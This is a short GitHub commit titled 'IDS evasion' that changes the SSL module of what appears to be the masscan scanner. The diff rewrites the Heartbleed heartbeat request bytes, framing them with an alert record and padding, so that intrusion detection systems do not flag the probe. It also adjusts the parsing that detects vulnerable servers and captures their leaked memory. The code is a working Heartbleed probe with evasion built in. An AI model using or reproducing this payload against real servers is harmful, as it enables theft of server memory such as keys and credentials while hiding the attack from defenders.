IDS evasion

CplusHua01 · Apr 10, 2014 · a7bc4ae · a7bc4ae
1 parent 23497c4
commit a7bc4ae
Showing 1 changed file with 7 additions and 12 deletions.
diff --git a/src/proto-ssl.c b/src/proto-ssl.c
@@ -224,8 +224,10 @@ server_hello(
         remaining--;
         hello->ext_remaining--;
         if (px[i]) {
-            static const char heartbleed_request[] = "\x18\x03\x02\x00\x03\x01\x40\x00";
-
+            static const char heartbleed_request[] = 
+                "\x15\x03\x02\x00\x02\x01\x80"
+                "\x18\x03\x02\x00\x14\x01" "\x0f\xe9" " "
+                "[masscan/1.0]   ";
             banout_append(  banout, PROTO_VULN, "SSL[heartbeat] ", 15);
             more->payload = heartbleed_request;
             more->length = sizeof(heartbleed_request)-1;
@@ -470,7 +472,7 @@ nothandshake_parse(
     unsigned i;
     enum {
         START,
-        LENGTH0, LENGTH1, LENGTH2,
+        LENGTH0, LENGTH1,
         CONTENTS,
         UNKNOWN,
     };
@@ -498,23 +500,16 @@ nothandshake_parse(
         remaining <<= 8;
         remaining |= px[i];
         //printf("." "  SSL else: type=%u length=%u\n", ssl->record.type, remaining);
-        DROPDOWN(i,length,state);
-
-    case LENGTH2:
-        remaining <<= 8;
-        remaining |= px[i];
-
         switch (ssl->record.type) {
-        case 0x02: /* heartbeat */
-            if (remaining > 1) {
+        case 0x02:
+            if (remaining >= 1) {
                 banout_append(  banout, PROTO_VULN, "SSL[HEARTBLEED] ", 16);
             }
 
             if (banner1->is_capture_heartbleed) {
                 banout_init_base64(&pstate->sub.ssl.x.server_cert.sub.base64);
                 banout_append(banout, PROTO_HEARTBLEED, "", 0);
             }
-            break;
         }
         DROPDOWN(i,length,state);